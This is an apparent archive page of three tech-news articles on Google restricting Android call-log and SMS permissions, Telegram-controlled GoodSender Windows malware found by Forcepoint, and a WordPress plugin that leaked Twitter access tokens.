Archives

computing

Google starts pulling unvetted Android apps that access call logs and SMS messages

Google is removing apps from Google Play that request permission to access call logs and SMS text message data but haven’t been manually vetted by Google staff.

The search and mobile giant said it is part of a move to cut down on apps that have access to sensitive calling and texting data.

Google said in October that Android apps will no longer be allowed to use the legacy permissions as part of a wider push for developers to use newer, more secure and privacy minded APIs. Many apps request access to call logs and texting data to verify two-factor authentication codes, for social sharing, or to replace the phone dialer. But Google acknowledged that this level of access can and has been abused by developers who misuse the permissions to gather sensitive data — or mishandle it altogether.

“Our new policy is designed to ensure that apps asking for these permissions need full and ongoing access to the sensitive data in order to accomplish the app’s primary use case, and that users will understand why this data would be required for the app to function,” wrote Paul Bankhead, Google’s director of product management for Google Play.

Any developer wanting to retain the ability to ask a user’s permission for calling and texting data has to fill out a permissions declaration.

Google will review the app and why it needs to retain access, and will weigh in several considerations, including why the developer is requesting access, the user benefit of the feature that’s requesting access and the risks associated with having access to call and texting data.

Bankhead conceded that under the new policy, some use cases will “no longer be allowed,” rendering some apps obsolete.

So far, tens of thousands of developers have already submitted new versions of their apps either removing the need to access call and texting permissions, Google said, or have submitted a permissions declaration.

Developers with a submitted declaration have until March 9 to receive approval or remove the permissions. In the meantime, Google has a full list of permitted use cases for the call log and text message permissions, as well as alternatives.

The last two years alone has seen several high-profile cases of Android apps or other services leaking or exposing call and text data. In late 2017, popular Android keyboard ai.type exposed a massive database of 31 million users, including 374 million phone numbers.

Decrypted Telegram bot chatter revealed as new Windows malware

Sometimes it take a small bug in one thing to find something massive elsewhere.

During an investigation recent, security firm Forcepoint Labs said it found a new kind of malware that was found taking instructions from a hacker sending commands over the encrypted messaging app Telegram .

The researchers described their newly discovered malware, dubbed GoodSender, as a “fairly simple” Windows-based malware that’s about a year old, which uses Telegram as the method to listen and wait for commands. Once the malware infects its target, it creates a new administrator account and enables remote desktop — and waits. As soon as the malware infects, it sends back the username and randomly generated password to the hacker through Telgram.

It’s not the first time malware has used a commercial product to communicate with malware. If it’s over the internet, hackers are hiding commands in pictures posted to Twitter or in comments left on celebrity Instagram posts.

But using an encrypted messenger makes it far harder to detect. At least, that’s the theory.

Forcepoint said in its research out Thursday that it only stumbled on the malware after it found a vulnerability in Telegram’s notoriously bad encryption.

End-to-end messages are encrypted using the app’s proprietary MTProto protocol, long slammed by cryptographers for leaking metadata and having flaws, and likened to “being stabbed in the eye with a fork.” Its bots, however, only use traditional TLS — or HTTPS — to communicate. The leaking metadata makes it easy to man-in-the-middle the connection and abuse the bots’ API to read bot sent-and-received messages, but also recover the full messaging history of the target bot, the researchers say.

When the researchers found the hacker using a Telegram bot to communicate with the malware, they dug in to learn more.

Fortunately, they were able to trace back the bot’s entire message history to the malware because each message had a unique message ID that increased incrementally, allowing the researchers to run a simple script to replay and scrape the bot’s conversation history.

The GoodSender malware is active and sends its first victim information. (Image: Forcepoint)

“This meant that we could track [the hacker’s] first steps towards creating and deploying the malware all the way through to current campaigns in the form of communications to and from both victims and test machines,” the researchers said.

Your bot uncovered, your malware discovered — what can make it worse for the hacker? The researchers know who they are.

Because the hacker didn’t have a clear separation between their development and production workspaces, the researchers say they could track the malware author because they used their own computer and didn’t mask their IP address.

The researchers could also see exactly what commands the malware would listen to: take screenshots, remove or download files, get IP address data, copy whatever’s in the clipboard, and even restart the PC.

But the researchers don’t have all the answers. How did the malware get onto victim computers in the first place? They suspect they used the so-called EternalBlue exploit, a hacking tool designed to target Windows computers, developed by and stolen from the National Security Agency, to gain access to unpatched computers. And they don’t know how many victims there are, except that there is likely more than 120 victims in the U.S., followed by Vietnam, India, and Australia.

Forcepoint informed Telegram of the vulnerability. TechCrunch also reached out to Telegram’s founder and chief executive Pavel Durov for comment, but didn’t hear back.

If there’s a lesson to learn? Be careful using bots on Telegram — and certainly don’t use Telegram for your malware.

A popular WordPress plugin leaked access tokens capable of hijacking Twitter accounts

A popular WordPress plugin, installed on thousands of websites to help users share content on social media sites, left linked Twitter accounts exposed to compromise.

The plugin, Social Network Tabs, was storing so-called account access tokens in the source code of the WordPress website. Anyone who viewed the source code could see the linked Twitter handle and the access tokens. These access tokens keep you logged in to the website on your phone and your computer without having to re-type your password every time or entering your two-factor authentication code.

But if stolen, most sites can’t differentiate between a token used by the account owner, or a hacker who stole the token.

Baptiste Robert, a French security researcher who goes by the online handle Elliot Alderson, found the vulnerability and shared details with TechCrunch.

In order to test the bug, Robert found 539 websites using the vulnerable code by searching PublicWWW, a website source code search engine. He then wrote a proof-of-concept script that scraped the publicly available code from the affected websites, collecting access tokens on more than than 400 linked Twitter accounts.

Using the obtained access tokens, Robert tested their permissions by directing those accounts to ‘favorite’ a tweet of his choosing over a hundred times. This confirmed that the exposed account keys had “read/write” access — effectively giving him, or a malicious hacker, complete control over the Twitter accounts.

Among the vulnerable accounts included a couple of verified Twitter users and several accounts with tens of thousands of followers, a Florida sheriff’s office, a casino in Oklahoma, an outdoor music venue in Cincinnati, and more.

Robert told Twitter on December 1 of the vulnerability in the third-part plugin, prompting the social media giant to revoke the keys, rendering the accounts safe again. Twitter also emailed the affected users of the security lapse of the WordPress plugin, but did not comment on the record when reached.

Twitter did its part — what little it could do when the security issue is out of its hands. Any WordPress user still using the plugin should remove it immediately, change their Twitter password, and ensure that the app is removed from Twitter’s connected apps to invalidate the token.

Design Chemical, a Bangkok-based software house that developed the buggy plugin, did not return a request for comment when contacted prior to publication.

On its website, it says the seven-year plugin has been downloaded more than 53,000 times. The plugin, last updated in 2013, still gets dozens of downloads each day.

MITRE assigned the vulnerability CVE-2018-20555. It’s the second bug Robert has disclosed in as many days.